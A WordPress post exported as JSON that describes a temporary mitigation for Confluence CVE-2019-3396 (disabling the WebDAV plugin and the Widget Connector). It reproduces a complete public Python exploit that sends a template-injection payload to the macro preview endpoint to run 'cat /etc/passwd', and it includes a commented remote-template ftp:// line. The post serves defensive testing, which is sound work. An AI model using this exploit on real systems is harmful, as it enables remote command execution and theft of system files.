{"id":846,"date":"2021-08-16T17:30:55","date_gmt":"2021-08-16T08:30:55","guid":{"rendered":"https:\/\/www.kkoc.org\/?p=846"},"modified":"2021-08-17T00:05:22","modified_gmt":"2021-08-16T15:05:22","slug":"confluence-cve-2019-3396-%ec%b7%a8%ec%95%bd%ec%a0%90-%ec%a1%b0%ec%b9%98","status":"publish","type":"post","link":"https:\/\/www.kkoc.org\/?p=846","title":{"rendered":"Confluence CVE-2019-3396 vulnerability remediation"},
"content":{"rendered":"\n<h2>Confluence CVE-2019-3396 vulnerability<\/h2>\n\n<p><a href=\"https:\/\/confluence.atlassian.com\/doc\/confluence-security-advisory-2019-03-20-966660264.html\" data-type=\"URL\" data-id=\"https:\/\/confluence.atlassian.com\/doc\/confluence-security-advisory-2019-03-20-966660264.html\">https:\/\/confluence.atlassian.com\/doc\/confluence-security-advisory-2019-03-20-966660264.html<\/a><\/p>\n\n<p>This post describes a temporary mitigation for Atlassian Confluence, based on v6.10.0.<\/p>\n\n<p><strong>Confluence administration &gt; select Manage add-ons<\/strong><\/p>\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1024x616.png\" alt=\"\" class=\"wp-image-850\" width=\"1024\" height=\"616\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1024x616.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-300x181.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-768x462.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-80x48.png 80w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image.png 1377w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n<p>Disable the WebDAV Plugin and the Widget Connector<\/p>\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1-1024x583.png\" alt=\"\" class=\"wp-image-852\" width=\"1024\" height=\"583\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1-1024x583.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1-300x171.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1-768x438.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1-80x46.png 80w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1.png 1090w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n<p><strong>Before the vulnerability remediation<\/strong><\/p>\n\n<p>&#8220;cat&nbsp;\/etc\/passwd&#8221; &lt;- there was a vulnerability that allowed commands such as this to be executed, and various shell scripts to be run.<\/p>\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-1024x516.png\" alt=\"\" class=\"wp-image-853\" width=\"1024\" height=\"516\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-1024x516.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-300x151.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-768x387.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-1536x773.png 1536w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-80x40.png 80w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2.png 1857w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n<p><strong>After the vulnerability remediation<\/strong><\/p>\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-1024x766.png\" alt=\"\" class=\"wp-image-854\" width=\"1024\" height=\"766\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-1024x766.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-300x224.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-768x574.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-200x150.png 200w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-80x60.png 80w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3.png 1031w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption>Confirmed that shell commands no longer execute on the host where Confluence is installed<\/figcaption><\/figure>\n\n<p><strong>Code used for the test<\/strong><\/p>\n\n<p><a href=\"https:\/\/github.com\/jas502n\/CVE-2019-3396\">https:\/\/github.com\/jas502n\/CVE-2019-3396<\/a><\/p>\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#coding=utf-8\n\nprint(r'''\n _____              __ _                             ______  _____  _____ \n\/  __ \\            \/ _| |                            | ___ \\\/  __ \\|  ___|\n| \/  \\\/ ___  _ __ | |_| |_   _  ___ _ __   ___ ___   | |_\/ \/| \/  \\\/| |__  \n| |    \/ _ \\| '_ \\|  _| | | | |\/ _ \\ '_ \\ \/ __\/ _ \\  |    \/ | |    |  __| \n| \\__\/\\ (_) | | | | | | | |_| |  __\/ | | | (_|  __\/  | |\\ \\ | \\__\/\\| |___ \n \\____\/\\___\/|_| |_|_| |_|\\__,_|\\___|_| |_|\\___\\___|  \\_| \\_| \\____\/\\____\/ \n                                                                          \n                                By Jas502n\n                                CVE-2019-3396                                          \n                                         \n ''')\nimport os\nimport sys\nimport re\nimport requests\n\n\nurl = \"https:\/\/confluence.kkoc.org\"\ncmd = \"cat \/etc\/passwd\"\n#url = sys.argv[1]\n#cmd = sys.argv[2]\n\nproxies = {\n    \"http\":\"http:\/\/127.0.0.1:8080\",\n    \"https\":\"https:\/\/127.0.0.1:8080\",\n    \"http\":\"socks5h:\/\/127.0.0.1:1080\",\n    \"https\":\"socks5h:\/\/127.0.0.1:1080\"\n}\n\npaylaod = url + \"\/rest\/tinymce\/1\/macro\/preview\"\n\nheaders = {\n    \"User-Agent\": \"Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0\",\n    \"Referer\": url + \"\/pages\/resumedraft.action?draftId=1&amp;draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&amp;\",\n    \"Content-Type\": \"application\/json; charset=utf-8\"\n}\n\npyftp = \"file:\/\/\/etc\/passwd\"\n\n#pyftp = \"ftp:\/\/10.10.20.166:8887\/r.vm\"\n\n\ndata = '{\"contentId\":\"1\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https:\/\/www.viddler.com\/v\/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"%s\",\"command\":\"%s\"}}}' % (pyftp,cmd)\nr = requests.post(paylaod, data=data, headers=headers)\n\n# print r.content\nif r.status_code == 200 and \"wiki-content\" in r.text:\n    m = re.findall('.*wiki-content\">\\n(.*)\\n            &lt;\/div>\\n', r.text, re.S)\n    print(\"\\n>>>>Usage: python test.py url cmd \\n\")\n    print(\">>>>Confluence Vuln url:  %s \\n\" %paylaod)\n\n    print('>>>>Command Response:\\n',m[0].strip())   <\/pre>\n","protected":false},
"excerpt":{"rendered":"<p>Confluence CVE-2019-3396 vulnerability https:\/\/confluence.atlassian.com\/doc\/confluence-security-advisory-2019-03-20-966660264.html This post describes a temporary mitigation for Atlassian Confluence, based on v6.10.0. Confluence administration &gt; select Manage add-ons Disable the WebDAV Plugin and the Widget Connector Before the vulnerability remediation &#8220;cat&nbsp;\/etc\/passwd&#8221; &lt;- there was a vulnerability that allowed commands such as this to be executed, and&#8230; <\/p>\n","protected":false},
"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,2],"tags":[],"_links":{"self":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/846"}],"collection":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=846"}],"version-history":[{"count":5,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/846\/revisions"}],"predecessor-version":[{"id":857,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/846\/revisions\/857"}],"wp:attachment":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=846"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=846"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=846"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}